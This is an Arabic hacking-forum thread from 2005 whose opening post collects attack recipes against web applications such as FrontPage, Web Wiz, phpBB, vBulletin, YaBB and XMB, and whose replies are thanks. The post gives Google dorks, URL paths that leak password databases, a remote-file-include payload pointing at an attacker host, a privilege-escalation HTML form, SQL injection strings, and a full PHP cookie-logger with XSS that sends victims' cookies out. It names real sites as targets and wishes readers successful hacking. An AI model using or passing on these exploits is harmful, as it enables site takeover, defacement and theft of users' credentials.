كل ثغراتي ادخل واخترق علي كيفك

للمواضيع العامة والتي لا يوجد لها قسم مناسب ومواضيع النقاشات والتي لا تهتم بالهكرز او باي من الاقسام التي في الاسفل


إضافة رد
قديم 04-07-2005
  #1
iL-kiLLeR
مشرف سابق
 
تاريخ التسجيل: Jan 2005
العمر: 28
المشاركات: 163
شكراً: 0
تم شكره 3 مرة في 3 مشاركة
افتراضي كل ثغراتي ادخل واخترق علي كيفك



انا اليوم جايب كل الثغرات الي انا مخترق بيها بكل انواعها واشكلاها ويا رب تعجبكم









--------------------------------------------------------------------------------



ثغرة الفرونت بيج



ثغرة الفرونت بيج ثغرة منتشرة جداً فى المواقع وهى من الثغرات الى توصلك مباشرة لكلمة السر الخاصة بالمدير وهى مشفرة



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث أى من الملفات التالية

Administrator.pwd

Author.pwd

Service.pwd



2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال هذا الموقع http://www.gumbysbigdayout.com/_vti_pvt/



3- راح تلاقيه فتح لك مجلد بدون اندكس به بعض الملفات اختر الملف الذى قمت بكتابته فى محرك البحث

مثلا Service.pwd



4- راح تلاقى الباسورد المشفرة أمامك http://www.gumbysbigdayout.com/_vti_pvt/service.pwd



عليك الآن فك تشفيرها باستخدام برنامج الجوهن وتسطيع تحميله من هذا الرابط

http://www.asbmay.com/Hac/pafiledb....tion=file&id=44



والآن بعد فك التشفير اصبح الموقع ملك لك وصرت انت مديره بالطبع تستطيع رفع الشيل وتجربة حظك مع السرفر والسيف مود



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::





ثغرة Top Rated



ثغرة التوب راتيد أو الأكثر تقييما ثغرة سهلة وفعالة ففى هذه النسخة يوجد اداة فى حالة الطوارئ تقوم بمسح الأدمن وانشاء ادمن افتراضى بيوزر وباسورد واحدة وهى admin فتمتع بها



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث top_rated.php



2- راح يطلع لك نتايج كثيرة اغلبها مصاب بهذه الثغرة راختر منها أى موقع



3- امسح هذه الكلمة من عنوان الموقع top_rated.php وأضف بدلاً منها recovery_tools/create_admin_user.php



4- إذا ظهرت لك صفحة فيها التالى

Delete old administrator user ....ok

Create new administrator user ....ok

فمبروك هذا الموقع مصاب بالثغرة والآن اصبح اليوزر نيم admin والباسورد admin

اذهب إلى لوحة التحكم بإضافة هذا الرابط cp.php



وتمتع بالإختراق



أما إن لم يكن الموقع مصاب بالثغرة فاخرج واعد البحث فى موقع آخر ولا تيأس بسهولة



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::



ثغرة wwwboard/passwd.txt



لنفترض أن الموقع المراد إختراقه هو http://www.boardprep.net/

لنضف إليه

wwwboard/passwd.txt

فيصبح العنوان http://www.boardprep.net/wwwboard/passwd.txt

نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE

كلمة المرور:إسم المستخدم

يعني إسم المستخدم هو cknouse

وكلمة المرور هيaexMVWnDOyrdE

فك تشفيره بجون ذي ريبر وستجده فى هذا الرابط

http://www.asbmay.com/Hac/pafiledb....tion=file&id=44

الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية

روح للفتب وإكتب ftp.domen.com

ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده

وحط اليوزر نيم والباسس وإدخل على الموقع أنشئ صفحة بإسم index.html

وإرفعها للموقع

:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::



ثغرة Weekly Poll



عن طريق هذه الثغرة يتم تحميل قاعدة البيانات وبها اسماء المستخدمين وكلات المرور



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث web wiz weekly poll



2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال www.XXX.com



3- ضيف على الموقع كلمة weekly_poll.mdb بحيث يصبح هكذا www.XXX.com/Poll/weekly_poll.mdb



4- راح تلاقى قاعدة البيانات بدأت تتحمل معك إن كان الموقع مصاب بهذه الثغرة



5- احصل على اسم المدير وكلمة السر ثم ادخل إلى لوحة التحكم وتمتع بالإختراق

:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::



ثغرة Aprox PHP Portal



هذه الثغرة تمكنك من باسوردات المشتركين بالمنتدى المصاب



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث Aprox PHP Portal



2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال www.XXX.com



3- ضيف على الموقع كلمة index.php?show=/etc/passwd بحيث يصبح هكذا www.XXX.com/index.php?show=/etc/passwd



4- راح تلاقى نفسك امام باسوردات الموقع



5- اخرج باسورد الأدمن واذهب للوحة التحكم وتمتع بالإختراق



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::

ثغرة Web Wiz Journal



ثغرة الويب ويز جورنال ثغرة بسيطة وسهلة جداً تمكنك من باسورد الأدمن والتحكم الشامل فى الجريدة



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث Web Wiz Journal



2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال www.XXX.com/Journal



3- ضيف على الموقع كلمة Journal.mdb بحيث يصبح هكذا www.XXX.com/Journal/Journal.mdb



4- راح يحمل معك قاعدة بيانات الموقع وفيها كل الباسوردات



5- اخرج باسورد الأدمن واذهب للوحة التحكم وتمتع بالإختراق



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::

ثغرة Php Nuke



ثغرة بسيطة لتغيير البانر الخاص بالمجلة النيوك





الثغره هي فى جميع أصدارات البى اتش بى نيوك الى لم يتم معالجتها



وهي تخليك تغير صفحه البانر من والى وهذه مثال لتغير صفحه البانر



http://conik/banners.php?op=Change&...http://where.to



طبعا لو تلاحظ اللينك راح تفهم



هنا انته عاد شوف شغلك http://where.to/



هنا التارجيت حقك http://conik/banners.php?



وان كنت تبغا تغير البنر رقم واحد الى مثلا conik.was.here



اتبع هذه الخطوه



http://www.conik.com/banners.php?op.../conik.was.here





http://www.conik.com/ طبعا هو الموقع الى مسوى رن للبى اتش بى نيوك



واذا طلعت لك هذا A web page that states that; "You changed the URL"



ما عليك اله تسوى شىء واحد وانتهى الموضوع الى هو رى لوود للصفحه وسوى كلك على البانر وراح يكون

ري دايركت على الموقع التاني



والحل لهذه المشكله سهل وبسيط جدا



http://phpnuke.org/download.php?dcategory=Fixes



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::



ثغرة Wihphoto



ثغرة تمكنك من التحكم بمكتبات الصور عن طريق تحميل قاعدة البيانات



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث Powered By Wihphoto



2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال هذا الموقع www.XXX.com/Fourm



3- ضيف بعد الموقع ومجلد المكتبة هذا الرابط sendphoto.php?album=..&pic=config.inc.php



4- راح تلاقى نفسك أمام نموذج إرسال ضع بريدك وارسل ارسل البيانات راح تلاقى كل شئ وصلك لعى بريدك



والآن ستصلك باسورد المدير على بريدك اذهب إلى لوحة التحكم وتمتع بالإختراق

:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::

ثغرة XMB 1.6 Magic



ثغرة تمكنك من التحكم التام بالمنتدى المصاب بها



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث XMB 1.6 Magic Lantern Final



2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال هذا الموقع www.XXX.com/Fourm



3- ضيف بعد الموقع ومجلد المكتبة هذا الرابط index_log.log بحيث تصبح هكذا www.XXX.com/Fourm/index_log.log



4- سوف يظهر لك تحميل الملف index_log.log وهو عبارة عن كوكيز لاسماء المستخدمين وباسوورداتهم وارقام تسجيلهم واشياء اخرى



5- عليك الان البحث عن اسم المدير (الادمنستور) بالذهاب الى قائمة الاعضاء ورؤية اول اسم



6- افتح ملف index_log.log ثم ابحث عن اسم المدير الذي وجدته , فلنفرض ان اسم المدير admin سوف نجد xmbuser=admin اسم المدير والباسوورد المشفرة بهذه الطريقة xmbpw=tdgb6hg6344he31c85f8gddf3c62bgdsg4 .



7- حمل البرنامج التاليchigger والذي يقوم بعملية الدخول الى لوحة التحكم بواسطة الباسوورد المشفرة .

http://www.asbmay.com/Hac/pafiledb....tion=file&id=93

8- طريقة عمل البرنامج كالتالي :..

----------------------------------------------------------------------------------

اولا فم بوضع اشارة (صح) .



ثانياً : قم بوضع اسم العضو سواء مدير او غيره .



ثالثاً : قم بوضع الباسوورد المشفر الخاصة بالعضو او المدير او غيره .



رابعاً : قم بوضع علامة صح اذا اردت وضع بروكسي لاكثر امان .



خامساً :قم بوضع البروكسي الي تريده .



سادساً : قم بوضع المنفذ الخاص البروكسي .

----------------------------------------------------------------------------------



9- اذهب الى المتصفح الانترنت اكسبلورير وافعل كالتالي

اضغط بالزر اليمين> الأتصالاات> اعدادات>

قم بوضع البروكسي هذا 127.0.0.1> والمنفذ 8080 , ولكن لا تنسي بعد ان تتم عملية الاختراق ان تعيد كل شيء كما كان .



10- اذهب الى المنتدى وسوف ترى في الاعلى رابط لوحة التحكم اضغط الى وتجول في غرفة لوحة تحكم المنتدى كما شئت .





:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::

ثغرة YaBB



عن طريق هذه الثغرة تستطيع تفعيل أى أمر php موجود خارج الموقع عن طريقه



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث Powered By YaBB



2- الآن عليك بتحميل صفحة PHP على موقعك بها أمر بى اتى بى مثلا هذا الأمر لتغيير الإندكس

<?

$fp = fopen ("index.php","w");

fputs ($fp,"_Sniper Fuc kZ!");

fclose ($fp);

?>



3- ضيف بعد الموقع ومجلد المنتدى هذا الرابط ssi.php?sourcedir=http://attackersite

مع تغيير http://attackersite بعنوان صفحة البى اتش بى الخاصة بك



والآن افتح الإندكس ولاحظ التغيير



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::

ثغرة PhpBB 2.0.0



ثغرة تمكنك من الحصول على Root بالمنتدى بحيث تصبح ادمن به



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث Powered By PhpBB 2.0.0



2- راح يطلع لك نتايج كثيرة جداً اختر أى منها على سبيل المثال هذا الموقع www.XXX.com/Fourm



3- عليك التسجيل بالموقع وحفظ رقم عضويتك



4- الآن افتح المفكرة والصق بها هذا الكود







<html>



<head>



</head>



<body>







<form method="post"



action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">



User Level: <select name="userlevel">



<option value="admin">Administrator</option>



<option value="user">User</option></select>



<input type="hidden" name="private[1]" value="0">



<input type="hidden" name="moderator[1]" value="0">



<input type="hidden" name="mode" value="user">



<input type="hidden" name="adv" value="">



User Number: <input type="text" name="u" size="5">



<input type="submit" name="submit" value="Submit">







</form>



</body>



</html>











5- عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory

6- اخفظه بامتداد html

7- عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى أضغط زر submit

8- بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك

ثم سوف تجد نفسك في لوحة تحكم المنتدى !! أفعل ماتريد المنتدى منتداك



الحل : هو تحديثه للنسخة الجديده وهي 2,0,5





:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::

ثغرة vBulletin 2.2.9



1- انسخ الكود واحفظه بالمفكرة بامتداد php

<?PHP

// vBulletin XSS Injection Vulnerability: Exploit

// ---

// Coded By : Sp.IC ([email protected]).

// Descrption: Fetching vBulletin's cookies and storing it into a log file.



// Variables:



$LogFile = "Cookies.Log";



// Functions:

/*

If ($HTTP_GET_VARS['Action'] = "Log") {

$Header = "<!--";

$Footer = "--->";

}

Else {



$Header = "";

$Footer = "";

}

Print ($Header);

*/

Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");

Print ("<Pre>");

Print ("<Center>");

Print ("vBulletin XSS Injection Vulnerability: Exploitn");

Print ("Coded By: Sp.IC<Hr Width="20%">");

/*

Print ($Footer);

*/



Switch ($HTTP_GET_VARS['Action']) {

Case "Log":



$Data = $HTTP_GET_VARS['Cookie'];

$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));

$Log = FOpen ($LogFile, "a+");

FWrite ($Log, Trim ($Data) . "n");

FClose ($Log);

Print ("<Meta HTTP-Equiv="Refresh" Content="0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "">");

Break;

Case "List":

If (!File_Exists ($LogFile) || !In_Array ($Records)) {

Print ("

There are No Records</Center></Pre>");

Exit ();

}

Else {

Print ("</Center></Pre>");

$Records = Array_UniQue (File ($LogFile));

Print ("<Pre>");

Print (".:: Staticsn");

Print ("n");

Print ("o Logged Records : " . Count (File ($LogFile)) . "n");

Print ("o Listed Records : " . Count ($Records) . " [Not Counting Duplicates]n");

Print ("n");



Print (".:: Optionsn");

Print ("n");



If (Count (File ($LogFile)) > 0) {

$Link['Download'] = "[Download]";

}

Else{

$Link['Download'] = "[No Records in Log]";

}



Print ("o Download Log : " . $Link['Download'] . "n");

Print ("o Clear Records : [Y]n");

Print ("n");

Print (".:: Recordsn");

Print ("n");



While (List ($Line[0], $Line[1]) = Each ($Records)) {

Print ("" . $Line[0] . ": " . $Line[1]);

}

}



Print ("</Pre>");

Break;

Case "Delete":

@UnLink ($LogFile);

Print ("

Deleted Succsesfuly</Center></Pre>") Or Die ("

Error: Cannot Delete Log</Center></Pre>");

Print ("<Meta HTTP-Equiv="Refresh" Content="3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "">");

Break;

}

?>

2- ارفع الملف لموقع يدعم php

3- اجعل الضحية يضغط على هذا اللينك

member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]

واستبدال [script code]

بهذا

<Script>location='Http://[مكان الملف الذي تم تحميله]?Action=Log&Cookie='+(document.cookie);</Script>

4- إذهب ألى هذا العنوان

Http:// مكان الملف الذي تم تحميله ?Action=List



================================

هناك تغييرات على الصفحه المرفوعه سوف تعملها كلاتي:

و لتخطي هذه المشكلة ينبغي استبدال رموز الـ Script Code بالنظير الست عشري لكل رمز، راجع الشفرة التالية:







PHP:--------------------------------------------------------------------------------

<?PHP



$Path = "Http://127.0.0.1/CookieLogger.php";



Print ("/member2.php?s=[Session]&action=viewsubscription&perpage=-->" . URLEncode ("<Script>location='" . $Path . "?Action=Log&Cookie='+(document.cookie);</Script>"));



?>



--------------------------------------------------------------------------------





تستطيع استبدال قيمة Path بعنوان أو مسار الاستثمار Exploit الخاص بالمسجل، ثم قم بنسخ المخرجات و ألحقها بمسار المنتدى، مثال:





code:--------------------------------------------------------------------------------Http://www.Web-Site.net/vB-Forum/member2.php?s=[Session]&action=viewsubscription&perpage=-->%3CScript%3Elocation%3D%27Http%3A%2F%2F127.0.0.1% 2 FCookieLogger.php%3FAction%3DLog%26Cookie%3D%27%2B %28document.cookie%29%3B%3C%2FScript%3E--------------------------------------------------------------------------------





و بالنسبة للاستثمار و الأخطاء التي يعطيها مفسر الـ PHP فيجب التأكد من توافقية الدوال مع اصدار المفسر.



ملاحظة: تم تجريب الاستثمار على



Apache/1.3.20 (Win32) PHP/4.0.6.



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::

ثغرة vBulletin 2.0.3



ثغرة تمكنك من التحكم بمكتبات الصور عن طريق تحميل قاعدة البيانات



1- اذهب إلى أى مرحك بحث وأنا انصح بالجوجل www.google.com

اكتب فى خانة البحث Powered By vBulletin 2.0.3



2- تأكد من وجود ملف calendar.php

اضف هذا الرابط مع مراعاه تغيير المتغيرات

http://www.example.com/vb/calendar....mma=";echo

المتغيرات

1-example.com بإسم الموقع

2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::

ثغرة vB 2.5



قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي



2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك



3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .



أو العنوان التفصيلي التالي :

http://target/memberlist.php



target= العنوان المستضيف للمنتدى



مثل = - .com



4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .



سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :



http://URL/member.php?soitgoe68e45u...info&userid=266



هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266



5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا



http://URL/member.php?soitgoe68e45u...etinfo&userid=1



العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .



(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))



أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية



6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :



CODE





query([email protected]'+WHE ' target='_blank'><a href="http://target/member.php?action=login&...V...EMAIL.HERE'+WHE" target="_blank"><a href="http://target/member.php?action=login&...V...EMAIL.HERE'+WHE" target="_blank"><a href="http://target/member.php?action=login&...V...EMAIL.HERE'+WHE" target="_blank"><a href="http://target/member.php?action=login&...V...EMAIL.HERE'+WHE" target="_blank"><a href="http://target/member.php?action=login&...V...EMAIL.HERE'+WHE" target="_blank">http://target/member.php?action=login&...V...EMAIL.HERE'+WHE</a></a></a></a></a> RE+username='ADMIN'').'











العنوان هذا ستقوم بتغيير الكلمات التالية



URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى

login = أسم المستخدم الخاص بك

VALIDPASS = كلمة السر الخاصة بك

[email protected] = البريد الذي سجلت به بالمنتدى

ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )



7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .



8. ثم ترجع لصفحة المنتدى الرئيسية

http://target/index.php



ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .



بالطيع ستظهر لك الصفحة التعيسة التي تقول :



أنت قمت بكتابة كلمة سر خاطئة



you typed in the wrong password





9. بكل بساطة أضغط على



نسيت كلمة السر

forgot password



والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني



10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى



والآن بعد فك التشفير اصبح الموقع ملك لك وصرت انت مديره بالطبع تستطيع رفع الشيل وتجربة حظك مع السرفر والسيف مود



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::

8



السلام عليكم



Details

Vulnerable systems:

* XMB Forum version 1.8

* XMB Forum version 1.9



Examples:

http://pathto/XMBforum/member.php?action=v...o&member=admin< script>alert(document.cookie)</script>



http://pathto/XMBforum/buddy.php?action=< script>alert(document.cookie)</script>&buddy=<script >alert(document.cookie)</script>







الحل لهذه الثغرة .............. هو





حرر الملف

member.php





CODE





if($doublee == "off" && strstr($email, "@")){



$email = trim($email);



$email1 = ", email";



$email2 = "OR email='$email'";



}







$username = trim($username);



$query = $db->query("SELECT username$email1 FROM $table_members WHERE username='$username'



$email2");









اسنبدله بهذا الكود ............



if($doublee == 'off' && (bool) false !== strpos($email, '@')) {



$email = addslashes(trim($email));



$email1 = ', email';



$email2 = "OR email='$email'";



}else{



$email1 = '';



$email2 = '';



}







$username = trim($username);



$query = $db->query("SELECT username$email1 FROM $table_members WHERE username='$username'



$email2");













^^^^^^^^^^^^^^^^^^^^^^^^^^

مكتشف الثغرة الحقيقي SaD jAckAl

حقوق الثغرة محفوظة موموهاك



******************************

:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::



ثغرة web wiz forum



السلام عليكم ورحمة الله



بسم الله الرحمن الرحيم

----------------------

اولا المتطلبات

برنامج microsoft acces

موقع مصاب

ثانيا:

الثغرة:

هي ثغرة منتديات الweb wiz forum

ثغرة معروفة وهي عبارة عن ملف data base توجد به كلمة سر المشرفين والمستخدمين

طريقة العمل :

مثال لموقع مصاب http://www.target.co.il/

الثغرة تكون كالتالي

http://www.target.co.il/admin/wwforum.mdb

اذا عبارة عن ملف data base تقوم بتحميله وفتحه عن طريق الacces

وتذهب الي tblauthourوتجد جدول به اسماء الاعضاء وغالبا المشرف يكون العضو رقم واحد

بعد ذلك تقوم بالتوجه اليhttp://www.target.co.il/admin

وتقوم بادخال اسم المستخدم وكلمة السر

وانت الان اصبحت الadmin

وصلة موقع اسرائيلي جاهزة

http://www.2playsafe.co.il/forum1/f...min/wwForum.mdb

http://www.televizia.net/forum/



:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::

ثغرة LinkMax2



اذهب إلى قوقل وابحث عنه فمثلا اكتب

Powered by LinkMax2



اذهب إلى أحد المواقع وتفضل :



http://www.restaurantblueprint.com/linkmax/



اكتب بعد الرابط اسم الملف

passcheck.asp

ليصبح الرابط كاملا :

http://www.restaurantblueprint.com/...x/passcheck.asp

ستظهر لك شاشة إدخال رمز المستخدم وكلمة السر

اكتب في خانة رمز المستخدم :اي شي

واكتب في خانة كلمة السر : اي شي



يعني اكتب ما تشاء المهم أن تكلف على نفسك وتكتب في الخانتين . ثم ارعص انتر .

طبعا ستظهر لك الصفحة نفسها وتقول لك خطأ في كلمة المستخدم وكلمة السر ، ما يهمك .



انتهت المرحلة الدخول :



اكتب هذا الملف : admin-system.asp

ليصبح الرابط هكذا :

http://www.restaurantblueprint.com/...dmin-system.asp



أو

اكتب هذا املف : data.mdb

ليصبح الرابط هكذا :

http://www.restaurantblueprint.com/...data.mdbPowered By

ـــــــصب AsbMay عــــــــ































ثغرة Include



الثغره في ملفات:

/admin/config.php و /dynamicpages/fast/config_page.php





1-الكود في ملف /admin/config.php :



++++++++++++++++++++++++

include_once $edp_relative_path."admin/serverdata.php";

++++++++++++++++++++++++



الاستثمارeXpL0iT:

http://victim/admin/config.php/edp_...ttp://attacker/





2-الكود في ملف /dynamicpages/fast/config_page.php :



++++++++++++++++++++++++

$ResultHtml="";

if ($do=="add_page") {

switch($du) {

case "site": include_once $edp_relative_path."admin/site_settings.php"; break;

case "dpage": include_once $edp_relative_path."admin/dpage_settings.php"; break;

++++++++++++++++++++++++



الاستثمارExPl0iT:

http://victim/dynamicpages/fast/con...ttp://attacker/



و اذا كان لديك scriptBackdoorفي : http://attacker/admin/site_settings.php

يبقى الاستثمارeXpl0iT هتكون كده :

http://victim/dynamicpages/fast/con...ttp://attacker/



يرجى ان تقوم بنسخ و لصخ الاكواد في النوت باد و تقرأها شمال-يمين عشان تكون واضحه

مع تمنياتنا لكم باختراق ناجح

eNj0Y



تحياتى تقبلو المزيد



وعايز اسمع ردود كتير ههههههه
__________________
iL-kiLLeR غير متواجد حالياً  
رد مع اقتباس
قديم 04-13-2005
  #2
افتراضي مشاركة: كل ثغراتي ادخل واخترق علي كيفك

ردى اه يا مان والله احسنت صنعا

تمام شرح جميل وثغرات حلوة



لك جزيل الشكر والاحترام والتقدير

اخوك محمد
__________________
Mr-sn@ke غير متواجد حالياً  
رد مع اقتباس
قديم 04-13-2005
  #3
MR.WOLF
صقر نشيط
 
تاريخ التسجيل: Jan 2005
العمر: 98
المشاركات: 57
شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي مشاركة: كل ثغراتي ادخل واخترق علي كيفك

الله الله جميل جدياً ..



الله يجزاك خير على الثغرات وشرحها ..



بأذن الله تشتعل ساحة الأنجازات بذا الموضوع ..



مبدع مبدع



أخوك خالد
__________________
آ؛

Mr.w0Lf

أ“أˆأچأ‡أ¤ أ‡أ،أ،أ¥ أ¦أˆأچأ£أڈأ¥ أ“أˆأچأ‡أ¤ أ‡أ،أ،أ¥ أ‡أ،أڑأ™أ*أ£
MR.WOLF غير متواجد حالياً  
رد مع اقتباس
قديم 04-13-2005
  #4
tango
صقر فعال
 
تاريخ التسجيل: Mar 2005
المشاركات: 119
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي مشاركة: كل ثغراتي ادخل واخترق علي كيفك

مشكور حبيبى الموضوع جميل
tango غير متواجد حالياً  
رد مع اقتباس
قديم 04-13-2005
  #5
iL-kiLLeR
مشرف سابق
 
تاريخ التسجيل: Jan 2005
العمر: 28
المشاركات: 163
شكراً: 0
تم شكره 3 مرة في 3 مشاركة
افتراضي مشاركة: كل ثغراتي ادخل واخترق علي كيفك

شطرا علي مروركم علي موضوعي وان شاء الله يكون في اكتر واكتر

و كل حد عايز يتعارف <a href=\"mailto:[email protected]\">medhat_914@ hotmail.com</a>

وان شاء الله نكون فريق قوي
__________________
iL-kiLLeR غير متواجد حالياً  
رد مع اقتباس
قديم 04-19-2005
  #6
spy_man
صقر جديد
 
تاريخ التسجيل: Apr 2005
المشاركات: 14
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي مشاركة: كل ثغراتي ادخل واخترق علي كيفك

الله عليك انتا والشرح

والله 100 100
__________________


spy_man غير متواجد حالياً  
رد مع اقتباس
قديم 04-19-2005
  #7
iL-kiLLeR
مشرف سابق
 
تاريخ التسجيل: Jan 2005
العمر: 28
المشاركات: 163
شكراً: 0
تم شكره 3 مرة في 3 مشاركة
افتراضي مشاركة: كل ثغراتي ادخل واخترق علي كيفك

الدمار الشامل
__________________
iL-kiLLeR غير متواجد حالياً  
رد مع اقتباس
قديم 04-20-2005
  #8
GaCkeR
مشرف سابق
 
تاريخ التسجيل: Feb 2005
الدولة: Egypt
العمر: 30
المشاركات: 1,527
شكراً: 0
تم شكره 16 مرة في 13 مشاركة
افتراضي مشاركة: كل ثغراتي ادخل واخترق علي كيفك

مشكور اخي علي الموضوع.المفيد.
__________________
<div align='left'>-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GAT d--- s: a-- C+++ UL++++ P+ L+ E W+++ N--- o-- K--- w+++++
O--- M-- V-- PS-- PE-- Y PGP---- 5++++ X-- R tv- b+++ DI-- D----
G+++++ e++ h-- r* y++

------END GEEK CODE BLOCK------
</div>
GaCkeR غير متواجد حالياً  
رد مع اقتباس
قديم 04-20-2005
  #9
ThEpUnKDrAgOn
صقر فعال
 
تاريخ التسجيل: Apr 2005
المشاركات: 140
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي مشاركة: كل ثغراتي ادخل واخترق علي كيفك

مشكوووووووور يعطيك الف عفية



مشكوووور
__________________
III لا شرف لمن لا كرامة له III
ThEpUnKDrAgOn غير متواجد حالياً  
رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
ادخل, ثغراتي, على, واخترق, كيفك

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة قوية وجميلة ادخل واخترق s2k9 عالم الثغرات - Vulnerabilities World 49 منذ 4 يوم 06:08 AM
تصاميم على كيف كيفك السلجوقي ابداعات الأعضاء 6 04-07-2010 11:50 PM
فكه التشفر واخترق هكر الطيب Recycle bin 1 12-07-2009 01:52 AM
كتب برمجية مجانية وعربية ادخل وحمل على كيفك :) HACKERS PAL منتدى لغات البرمجة 9 10-20-2008 11:20 PM
فك الهاش واخترق علي كيفك " 43 موقع " free7hacker معرض الانجازات - HACKERS SHOW OFF 22 09-19-2008 10:18 PM


الساعة الآن 08:51 PM.